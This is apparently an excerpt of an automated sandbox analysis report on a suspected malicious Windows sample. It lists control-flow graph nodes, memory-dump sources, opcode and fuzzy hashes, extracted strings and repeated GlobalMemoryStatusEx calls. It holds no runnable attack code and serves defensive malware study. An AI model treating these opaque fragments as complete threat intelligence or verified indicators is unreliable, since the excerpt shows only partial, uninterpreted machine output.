                                                                                                                                control_flow_graph 25 401000-40102e malloc 26 401031-401039 25->26 27 401087-40108b 26->27 28 40103f-401085 26->28 28->26
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                • j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv, xrefs: 0040106E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000019.00000001.2295576638.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000019.00000001.2295576638.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000019.00000001.2295576638.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_25_1_400000_lxsyrsiW.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: malloc
                                                                                                                                • String ID: j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv
                                                                                                                                • API String ID: 2803490479-2443507578
                                                                                                                                • Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                                                • Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
                                                                                                                                • Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                                                • Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 31 4013ff-401452 call 401358 call 40108c call 4013b4
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000019.00000001.2295576638.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000019.00000001.2295576638.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000019.00000001.2295576638.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_25_1_400000_lxsyrsiW.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: memset$EntryPointfopenstrcmpstrcpy
                                                                                                                                • String ID: D`:vD`:v$D`:vD`:v
                                                                                                                                • API String ID: 4108700736-3916433284
                                                                                                                                • Opcode ID: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
                                                                                                                                • Instruction ID: 7b5742814f41c47d4244d2c3f0283e0289412fe64b87ae5b76c2526650b71fed
                                                                                                                                • Opcode Fuzzy Hash: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
                                                                                                                                • Instruction Fuzzy Hash: 4BF074B5A04248AFCB40EFB9D981D8A77F8BB4C304B5044B6F948D7351E674EA448B58

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:14.7%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:214
                                                                                                                                Total number of Limit Nodes:29
                                                                                                                                execution_graph 28032 2520848 28034 252084e 28032->28034 28033 252091b 28034->28033 28037 2521487 28034->28037 28044 252137f 28034->28044 28038 2521396 28037->28038 28039 2521484 28038->28039 28043 2521487 4 API calls 28038->28043 28051 2527d90 28038->28051 28058 2527c85 28038->28058 28066 2527ea8 28038->28066 28039->28034 28043->28038 28045 25212c4 28044->28045 28046 2521383 28044->28046 28045->28034 28046->28045 28047 2521487 4 API calls 28046->28047 28048 2527d90 4 API calls 28046->28048 28049 2527c85 4 API calls 28046->28049 28050 2527ea8 4 API calls 28046->28050 28047->28046 28048->28046 28049->28046 28050->28046 28052 2527da6 28051->28052 28054 2527e57 28052->28054 28074 2528718 28052->28074 28053 2527f12 28053->28038 28054->28053 28080 252f612 28054->28080 28085 252f7bf 28054->28085 28059 2527c0b 28058->28059 28061 2527c8a 28058->28061 28060 2527f12 28060->28038 28062 2527e57 28061->28062 28065 2528718 4 API calls 28061->28065 28062->28060 28063 252f612 4 API calls 28062->28063 28064 252f7bf 4 API calls 28062->28064 28063->28060 28064->28060 28065->28061 28067 2527eb2 28066->28067 28069 2527ecc 28067->28069 28070 61dfb58 4 API calls 28067->28070 28071 61dfb68 4 API calls 28067->28071 28068 2527f12 28068->28038 28069->28068 28072 252f612 4 API calls 28069->28072 28073 252f7bf 4 API calls 28069->28073 28070->28069 28071->28069 28072->28068 28073->28068 28075 252871d 28074->28075 28076 2528f2d 28075->28076 28090 252a04b 28075->28090 28096 2529fa8 28075->28096 28102 2529f98 28075->28102 28076->28052 28081 252f639 28080->28081 28082 252f6af 28081->28082 28226 252f850 28081->28226 28232 252f840 28081->28232 28086 252f7ca 28085->28086 28267 61dfb58 28086->28267 28274 61dfb68 28086->28274 28087 252f7d1 28087->28053 28091 252a020 28090->28091 28092 252a061 28091->28092 28108 252a098 28091->28108 28115 252a0a8 28091->28115 28122 252a1b6 28091->28122 28098 2529fc5 28096->28098 28097 252a061 28098->28097 28099 252a098 4 API calls 28098->28099 28100 252a1b6 4 API calls 28098->28100 28101 252a0a8 4 API calls 28098->28101 28099->28098 28100->28098 28101->28098 28104 2529fa8 28102->28104 28103 252a061 28104->28103 28105 252a098 4 API calls 28104->28105 28106 252a1b6 4 API calls 28104->28106 28107 252a0a8 4 API calls 28104->28107 28105->28104 28106->28104 28107->28104 28110 252a0a8 28108->28110 28109 252a182 28110->28109 28112 252a1b6 4 API calls 28110->28112 28138 252a1c0 28110->28138 28148 252a2d8 28110->28148 28158 252a4d6 28110->28158 28112->28110 28116 252a0c2 28115->28116 28117 252a182 28116->28117 28118 252a1c0 4 API calls 28116->28118 28119 252a1b6 4 API calls 28116->28119 28120 252a4d6 4 API calls 28116->28120 28121 252a2d8 4 API calls 28116->28121 28118->28116 28119->28116 28120->28116 28121->28116 28123 252a143 28122->28123 28126 252a1ba 28122->28126 28124 252a182 28123->28124 28130 252a1c0 4 API calls 28123->28130 28131 252a1b6 4 API calls 28123->28131 28132 252a4d6 4 API calls 28123->28132 28133 252a2d8 4 API calls 28123->28133 28124->28124 28125 252a505 28125->28091 28126->28125 28127 252df00 4 API calls 28126->28127 28128 252de38 4 API calls 28126->28128 28129 252de28 4 API calls 28126->28129 28134 252a1c0 4 API calls 28126->28134 28135 252a1b6 4 API calls 28126->28135 28136 252a4d6 4 API calls 28126->28136 28137 252a2d8 4 API calls 28126->28137 28127->28126 28128->28126 28129->28126 28130->28123 28131->28123 28132->28123 28133->28123 28134->28126 28135->28126 28136->28126 28137->28126 28139 252a1e1 28138->28139 28140 252a505 28139->28140 28141 252a1c0 4 API calls 28139->28141 28142 252a1b6 4 API calls 28139->28142 28143 252a4d6 4 API calls 28139->28143 28144 252a2d8 4 API calls 28139->28144 28168 252de28 28139->28168 28173 252df00 28139->28173 28178 252de38 28139->28178 28140->28110 28141->28139 28142->28139 28143->28139 28144->28139 28150 252a1e1 28148->28150 28149 252a505 28149->28110 28150->28149 28151 252df00 4 API calls 28150->28151 28152 252de38 4 API calls 28150->28152 28153 252de28 4 API calls 28150->28153 28154 252a1c0 4 API calls 28150->28154 28155 252a1b6 4 API calls 28150->28155 28156 252a4d6 4 API calls 28150->28156 28157 252a2d8 4 API calls 28150->28157 28151->28150 28152->28150 28153->28150 28154->28150 28155->28150 28156->28150 28157->28150 28160 252a1e1 28158->28160 28159 252a505 28159->28110 28160->28159 28161 252a1c0 4 API calls 28160->28161 28162 252a1b6 4 API calls 28160->28162 28163 252a4d6 4 API calls 28160->28163 28164 252a2d8 4 API calls 28160->28164 28165 252df00 4 API calls 28160->28165 28166 252de38 4 API calls 28160->28166 28167 252de28 4 API calls 28160->28167 28161->28160 28162->28160 28163->28160 28164->28160 28165->28160 28166->28160 28167->28160 28170 252dde5 28168->28170 28169 252de47 28169->28139 28170->28168 28170->28169 28183 252eed0 28170->28183 28175 252df1a 28173->28175 28174 252df6b 28174->28139 28175->28174 28177 252eed0 4 API calls 28175->28177 28176 252e37e 28176->28139 28177->28176 28180 252de47 28178->28180 28181 252dea7 28178->28181 28179 252e37e 28179->28139 28180->28139 28181->28180 28182 252eed0 4 API calls 28181->28182 28182->28179 28188 252ef18 28183->28188 28200 252efa8 28183->28200 28211 252ef08 28183->28211 28184 252e37e 28184->28139 28189 252ef25 28188->28189 28191 252ef4d 28188->28191 28189->28184 28190 252ef6e 28190->28184 28191->28190 28192 252efc6 28191->28192 28196 252ef18 3 API calls 28191->28196 28197 252ef08 3 API calls 28191->28197 28199 252efa8 3 API calls 28191->28199 28223 252efe8 28191->28223 28193 252efd3 28192->28193 28194 252f036 GlobalMemoryStatusEx 28192->28194 28193->28184 28195 252f066 28194->28195 28195->28184 28196->28191 28197->28191 28199->28191 28201 252efc6 28200->28201 28206 252ef51 28200->28206 28202 252efd3 28201->28202 28203 252f036 GlobalMemoryStatusEx 28201->28203 28202->28184 28205 252f066 28203->28205 28204 252ef6e 28204->28184 28205->28184 28206->28201 28206->28204 28207 252ef18 3 API calls 28206->28207 28208 252ef08 3 API calls 28206->28208 28209 252efe8 GlobalMemoryStatusEx 28206->28209 28210 252efa8 3 API calls 28206->28210 28207->28206 28208->28206 28209->28206 28210->28206 28212 252ef25 28211->28212 28214 252ef4d 28211->28214 28212->28184 28213 252ef6e 28213->28184 28214->28213 28215 252efc6 28214->28215 28219 252ef18 3 API calls 28214->28219 28220 252ef08 3 API calls 28214->28220 28221 252efe8 GlobalMemoryStatusEx 28214->28221 28222 252efa8 3 API calls 28214->28222 28216 252efd3 28215->28216 28217 252f036 GlobalMemoryStatusEx 28215->28217 28216->28184 28218 252f066 28217->28218 28218->28184 28219->28214 28220->28214 28221->28214 28222->28214 28224 252f036 GlobalMemoryStatusEx 28223->28224 28225 252f066 28224->28225 28225->28191 28227 252f855 28226->28227 28228 252f883 28227->28228 28238 252f890 28227->28238 28245 252fa87 28227->28245 28252 252fb06 28227->28252 28228->28081 28233 252f855 28232->28233 28234 252f883 28233->28234 28235 252f890 4 API calls 28233->28235 28236 252fb06 4 API calls 28233->28236 28237 252fa87 4 API calls 28233->28237 28234->28081 28235->28233 28236->28233 28237->28233 28240 252f8b7 28238->28240 28239 252fb32 28239->28227 28240->28239 28241 252fb70 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28240->28241 28242 252fb6a GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28240->28242 28259 252fd19 28240->28259 28263 252ff9c 28240->28263 28241->28240 28242->28240 28247 252f916 28245->28247 28246 252fb32 28246->28227 28247->28246 28248 252fb70 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28247->28248 28249 252fb6a GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28247->28249 28250 252fd19 4 API calls 28247->28250 28251 252ff9c 4 API calls 28247->28251 28248->28247 28249->28247 28250->28247 28251->28247 28254 252f916 28252->28254 28253 252fb32 28253->28227 28254->28253 28255 252fb70 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28254->28255 28256 252fb6a GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28254->28256 28257 252fd19 4 API calls 28254->28257 28258 252ff9c 4 API calls 28254->28258 28255->28254 28256->28254 28257->28254 28258->28254 28262 252fd47 28259->28262 28260 252df00 4 API calls 28260->28262 28261 252fd8a 28261->28240 28262->28260 28262->28261 28266 252fd47 28263->28266 28264 252df00 4 API calls 28264->28266 28265 252fd8a 28265->28240 28266->28264 28266->28265 28269 61dfb7d 28267->28269 28268 61dfd92 28268->28087 28269->28268 28270 252df00 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28269->28270 28271 252e1e1 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28269->28271 28272 252de38 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28269->28272 28273 252de28 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28269->28273 28270->28269 28271->28269 28272->28269 28273->28269 28276 61dfb7d 28274->28276 28275 61dfd92 28275->28087 28276->28275 28277 252e1e1 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28276->28277 28278 252de38 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28276->28278 28279 252de28 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28276->28279 28280 252df00 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28276->28280 28277->28276 28278->28276 28279->28276 28280->28276

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1741 61d7e78-61d7e96 1742 61d7e98-61d7e9b 1741->1742 1743 61d7e9d-61d7eab 1742->1743 1744 61d7eb2-61d7eb5 1742->1744 1752 61d7ead 1743->1752 1753 61d7f1e-61d7f34 1743->1753 1745 61d7eb7-61d7ec1 1744->1745 1746 61d7ec2-61d7ec5 1744->1746 1748 61d7ee8-61d7eeb 1746->1748 1749 61d7ec7-61d7ee3 1746->1749 1750 61d7eed-61d7f07 1748->1750 1751 61d7f0c-61d7f0e 1748->1751 1749->1748 1750->1751 1755 61d7f15-61d7f18 1751->1755 1756 61d7f10 1751->1756 1752->1744 1759 61d814f-61d8159 1753->1759 1760 61d7f3a-61d7f43 1753->1760 1755->1742 1755->1753 1756->1755 1762 61d7f49-61d7f66 1760->1762 1763 61d815a-61d818f 1760->1763 1771 61d813c-61d8149 1762->1771 1772 61d7f6c-61d7f94 1762->1772 1767 61d8191-61d8194 1763->1767 1769 61d83c9-61d83cc 1767->1769 1770 61d819a-61d81a9 1767->1770 1773 61d83ef-61d83f2 1769->1773 1774 61d83ce-61d83ea 1769->1774 1782 61d81c8-61d820c 1770->1782 1783 61d81ab-61d81c6 1770->1783 1771->1759 1771->1760 1772->1771 1798 61d7f9a-61d7fa3 1772->1798 1776 61d849d-61d849f 1773->1776 1777 61d83f8-61d8404 1773->1777 1774->1773 1778 61d84a6-61d84a9 1776->1778 1779 61d84a1 1776->1779 1784 61d840f-61d8411 1777->1784 1778->1767 1785 61d84af-61d84b8 1778->1785 1779->1778 1796 61d839d-61d83b3 1782->1796 1797 61d8212-61d8223 1782->1797 1783->1782 1786 61d8429-61d842d 1784->1786 1787 61d8413-61d8419 1784->1787 1794 61d842f-61d8439 1786->1794 1795 61d843b 1786->1795 1792 61d841d-61d841f 1787->1792 1793 61d841b 1787->1793 1792->1786 1793->1786 1801 61d8440-61d8442 1794->1801 1795->1801 1796->1769 1807 61d8229-61d8246 1797->1807 1808 61d8388-61d8397 1797->1808 1798->1763 1802 61d7fa9-61d7fc5 1798->1802 1803 61d8444-61d8447 1801->1803 1804 61d8453-61d848c 1801->1804 1811 61d7fcb-61d7ff5 1802->1811 1812 61d812a-61d8136 1802->1812 1803->1785 1804->1770 1824 61d8492-61d849c 1804->1824 1807->1808 1820 61d824c-61d8342 call 61d6698 1807->1820 1808->1796 1808->1797 1825 61d7ffb-61d8023 1811->1825 1826 61d8120-61d8125 1811->1826 1812->1771 1812->1798 1874 61d8344-61d834e 1820->1874 1875 61d8350 1820->1875 1825->1826 1833 61d8029-61d8057 1825->1833 1826->1812 1833->1826 1838 61d805d-61d8066 1833->1838 1838->1826 1839 61d806c-61d809e 1838->1839 1847 61d80a9-61d80c5 1839->1847 1848 61d80a0-61d80a4 1839->1848 1847->1812 1851 61d80c7-61d811e call 61d6698 1847->1851 1848->1826 1850 61d80a6 1848->1850 1850->1847 1851->1812 1876 61d8355-61d8357 1874->1876 1875->1876 1876->1808 1877 61d8359-61d835e 1876->1877 1878 61d836c 1877->1878 1879 61d8360-61d836a 1877->1879 1880 61d8371-61d8373 1878->1880 1879->1880 1880->1808 1881 61d8375-61d8381 1880->1881 1881->1808
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447051503.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61d0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $]q$$]q
                                                                                                                                • API String ID: 0-127220927
                                                                                                                                • Opcode ID: 83631cd3d92fa4419db62a3ae0febf264132eee77d0e8430fcc415da7064433f
                                                                                                                                • Instruction ID: 072e4f46e429dba4623a65e5e4c40e1833c9902165a92560741171e937830339
                                                                                                                                • Opcode Fuzzy Hash: 83631cd3d92fa4419db62a3ae0febf264132eee77d0e8430fcc415da7064433f
                                                                                                                                • Instruction Fuzzy Hash: D3026F31B002059FDB94DFA8D590AAEB7F6EF84304F148929E4199B394DB35EC46CB91

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 2823 61c1b48-61c1b65 2824 61c1b67-61c1b6a 2823->2824 2825 61c1b6c-61c1b7f 2824->2825 2826 61c1b84-61c1b87 2824->2826 2825->2826 2827 61c1baf-61c1bb2 2826->2827 2828 61c1b89-61c1baa call 61c10dc 2826->2828 2830 61c1bb4-61c1bb8 2827->2830 2831 61c1bc3-61c1bc6 2827->2831 2828->2827 2834 61c1bbe 2830->2834 2835 61c1c7a-61c1c84 2830->2835 2836 61c1bc8-61c1c28 2831->2836 2837 61c1c37-61c1c3a 2831->2837 2834->2831 2863 61c1c30-61c1c32 2836->2863 2838 61c1c3c-61c1c49 2837->2838 2839 61c1c4e-61c1c51 2837->2839 2838->2839 2841 61c1c87-61c1cc7 2839->2841 2842 61c1c53-61c1c56 2839->2842 2859 61c1cc9-61c1cd4 2841->2859 2844 61c1c68-61c1c6a 2842->2844 2845 61c1c58-61c1c63 2842->2845 2846 61c1c6c 2844->2846 2847 61c1c71-61c1c74 2844->2847 2845->2844 2846->2847 2847->2824 2847->2835 2862 61c1cd6-61c1cea 2859->2862 2864 61c1cec-61c1cef 2862->2864 2863->2837 2865 61c1d98-61c1dd0 2864->2865 2866 61c1cf5-61c1cf8 2864->2866 2886 61c1dd7-61c1e7d 2865->2886 2867 61c1cfa-61c1d10 call 61c10e8 2866->2867 2868 61c1d15-61c1d18 2866->2868 2867->2868 2870 61c1d1a-61c1d30 call 61c10e8 2868->2870 2871 61c1d35-61c1d38 2868->2871 2870->2871 2875 61c1d3a-61c1d3c 2871->2875 2876 61c1d43-61c1d46 2871->2876 2878 61c1d8e-61c1d95 2875->2878 2879 61c1d3e 2875->2879 2880 61c1d5c-61c1d5f 2876->2880 2881 61c1d48-61c1d57 2876->2881 2879->2876 2883 61c1d69-61c1d6c 2880->2883 2884 61c1d61-61c1d66 2880->2884 2881->2880 2885 61c1d6e-61c1d71 2883->2885 2883->2886 2884->2883 2889 61c1d7c-61c1d7e 2885->2889 2890 61c1d73-61c1d75 2885->2890 2902 61c1e7f-61c1e85 2886->2902 2903 61c1e88-61c1e8e 2886->2903 2893 61c1d85-61c1d88 2889->2893 2894 61c1d80 2889->2894 2890->2881 2891 61c1d77 2890->2891 2891->2889 2893->2864 2893->2878 2894->2893 2902->2903 2904 61c1e9e-61c1edc 2903->2904 2905 61c1e90-61c1e9c 2903->2905 2907 61c1ede-61c1ee4 2904->2907 2908 61c1ee5-61c1ef9 2904->2908 2905->2904 2907->2908
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: nKuq
                                                                                                                                • API String ID: 0-4080595220
                                                                                                                                • Opcode ID: bcc7cbb9c9a5d8a135bb967d5f44267ae2078091c52a1f35d36e853a4fafaf63
                                                                                                                                • Instruction ID: 6731ce2577a892d48e76389876050a45b105260f7f5f803767aa0a9071cf9675
                                                                                                                                • Opcode Fuzzy Hash: bcc7cbb9c9a5d8a135bb967d5f44267ae2078091c52a1f35d36e853a4fafaf63
                                                                                                                                • Instruction Fuzzy Hash: 55B1C271E00219AFDB64DFA9C8457AEBBB6FF89320F10452EE909E7291D7349901CBD1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447051503.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61d0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3432076eb15250e5ff5ca84e7292a5ea765fff5a173b1bedf785d5a924462a89
                                                                                                                                • Instruction ID: 7a6d67b14328c6311a490593c1927797c47d91af17b0d74b14d1e2b42654e3ad
                                                                                                                                • Opcode Fuzzy Hash: 3432076eb15250e5ff5ca84e7292a5ea765fff5a173b1bedf785d5a924462a89
                                                                                                                                • Instruction Fuzzy Hash: ED329230B002059FDF54DFA8D990AAEB7B6FB88310F108925E405EB399DB34EC46CB91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447051503.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61d0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 72094a0d1728b56b37726b235d618137031376c20968b65d39ae9eff61a94903
                                                                                                                                • Instruction ID: bb34b8b3f8d32ccb5297ec26db3edf0e45e87d4cd4a2a2a2aaae55d81bca6568
                                                                                                                                • Opcode Fuzzy Hash: 72094a0d1728b56b37726b235d618137031376c20968b65d39ae9eff61a94903
                                                                                                                                • Instruction Fuzzy Hash: CD12C175F002159FDF64DBA4D9806AEBBB3EF84310F248829E55A9B384DB34DD42CB91

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 863 61d9250-61d9275 864 61d9277-61d927a 863->864 865 61d9b38-61d9b3b 864->865 866 61d9280-61d9295 864->866 867 61d9b3d-61d9b5c 865->867 868 61d9b61-61d9b63 865->868 873 61d92ad-61d92c3 866->873 874 61d9297-61d929d 866->874 867->868 870 61d9b6a-61d9b6d 868->870 871 61d9b65 868->871 870->864 875 61d9b73-61d9b7d 870->875 871->870 880 61d92ce-61d92d0 873->880 876 61d929f 874->876 877 61d92a1-61d92a3 874->877 876->873 877->873 881 61d92e8-61d9359 880->881 882 61d92d2-61d92d8 880->882 893 61d935b-61d937e 881->893 894 61d9385-61d93a1 881->894 883 61d92dc-61d92de 882->883 884 61d92da 882->884 883->881 884->881 893->894 899 61d93cd-61d93e8 894->899 900 61d93a3-61d93c6 894->900 905 61d93ea-61d940c 899->905 906 61d9413-61d942e 899->906 900->899 905->906 911 61d9430-61d944c 906->911 912 61d9453-61d9461 906->912 911->912 913 61d9471-61d94eb 912->913 914 61d9463-61d946c 912->914 920 61d94ed-61d950b 913->920 921 61d9538-61d954d 913->921 914->875 925 61d950d-61d951c 920->925 926 61d9527-61d9536 920->926 921->865 925->926 926->920 926->921
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447051503.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61d0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $]q$$]q$$]q$$]q
                                                                                                                                • API String ID: 0-858218434
                                                                                                                                • Opcode ID: b9d909590b96f54a45a5bf443cf1f2c74596b939fd4acc0c4a657e210f58887f
                                                                                                                                • Instruction ID: edbefba3164e0987c70c0768f623bb4a3e5543bc4ce970acff3d629ff2b873a6
                                                                                                                                • Opcode Fuzzy Hash: b9d909590b96f54a45a5bf443cf1f2c74596b939fd4acc0c4a657e210f58887f
                                                                                                                                • Instruction Fuzzy Hash: 67916F30B1020A9FDB54DFA4D990BAE77B6AF84204F118965C819EB348EF74DD468B91

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 2115 61c0802-61c082f 2116 61c09ea-61c0a0e 2115->2116 2117 61c0835-61c083e 2115->2117 2121 61c0a15-61c0ab0 call 61c0670 2116->2121 2120 61c0844-61c0899 2117->2120 2117->2121 2130 61c089b-61c08c0 2120->2130 2131 61c08c3-61c08cc 2120->2131 2160 61c0ab5-61c0aba 2121->2160 2130->2131 2133 61c08ce 2131->2133 2134 61c08d1-61c08e1 2131->2134 2133->2134 2171 61c08e3 call 61c0a60 2134->2171 2172 61c08e3 call 61c09f0 2134->2172 2173 61c08e3 call 61c0802 2134->2173 2136 61c08e9-61c08eb 2139 61c08ed-61c08f2 2136->2139 2140 61c0945-61c0992 2136->2140 2142 61c092b-61c093e 2139->2142 2143 61c08f4-61c0929 2139->2143 2154 61c0999-61c099e 2140->2154 2142->2140 2143->2154 2155 61c09a8-61c09ad 2154->2155 2156 61c09a0 2154->2156 2158 61c09af 2155->2158 2159 61c09b7-61c09bc 2155->2159 2156->2155 2158->2159 2162 61c09be-61c09cc call 61c04e4 call 61c04fc 2159->2162 2163 61c09d1 2159->2163 2162->2163 2163->2116 2171->2136 2172->2136 2173->2136
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (&]q$(aq
                                                                                                                                • API String ID: 0-1602648543
                                                                                                                                • Opcode ID: 66e24b680683632158e9c642b9b1ee9982cdb0fec6ea11f996acb7e310d03e70
                                                                                                                                • Instruction ID: 1f10250d47f048c649071af8f756a2f8fa647c73d702da73cee5a610f5bd3646
                                                                                                                                • Opcode Fuzzy Hash: 66e24b680683632158e9c642b9b1ee9982cdb0fec6ea11f996acb7e310d03e70
                                                                                                                                • Instruction Fuzzy Hash: FE71B131F002199BDB55DFB8D850AEFBBB6AF98750F14842AE805AB380DF309D42C795

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 2174 61d9241-61d9275 2175 61d9277-61d927a 2174->2175 2176 61d9b38-61d9b3b 2175->2176 2177 61d9280-61d9295 2175->2177 2178 61d9b3d-61d9b5c 2176->2178 2179 61d9b61-61d9b63 2176->2179 2184 61d92ad-61d92c3 2177->2184 2185 61d9297-61d929d 2177->2185 2178->2179 2181 61d9b6a-61d9b6d 2179->2181 2182 61d9b65 2179->2182 2181->2175 2186 61d9b73-61d9b7d 2181->2186 2182->2181 2191 61d92ce-61d92d0 2184->2191 2187 61d929f 2185->2187 2188 61d92a1-61d92a3 2185->2188 2187->2184 2188->2184 2192 61d92e8-61d9359 2191->2192 2193 61d92d2-61d92d8 2191->2193 2204 61d935b-61d937e 2192->2204 2205 61d9385-61d93a1 2192->2205 2194 61d92dc-61d92de 2193->2194 2195 61d92da 2193->2195 2194->2192 2195->2192 2204->2205 2210 61d93cd-61d93e8 2205->2210 2211 61d93a3-61d93c6 2205->2211 2216 61d93ea-61d940c 2210->2216 2217 61d9413-61d942e 2210->2217 2211->2210 2216->2217 2222 61d9430-61d944c 2217->2222 2223 61d9453-61d9461 2217->2223 2222->2223 2224 61d9471-61d94eb 2223->2224 2225 61d9463-61d946c 2223->2225 2231 61d94ed-61d950b 2224->2231 2232 61d9538-61d954d 2224->2232 2225->2186 2236 61d950d-61d951c 2231->2236 2237 61d9527-61d9536 2231->2237 2232->2176 2236->2237 2237->2231 2237->2232
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.2447051503.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_61d0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $]q$$]q
                                                                                                                                • API String ID: 0-127220927
                                                                                                                                • Opcode ID: 9e32be205690ffb5c4fd0e64044e04e1dd20a8d253a4b7932a31935621f5bff8
                                                                                                                                • Instruction ID: 1c13ad6e671ef1834212c094543a2f83650f132903bbff79da6db235e18818ff
                                                                                                                                • Opcode Fuzzy Hash: 9e32be205690ffb5c4fd0e64044e04e1dd20a8d253a4b7932a31935621f5bff8
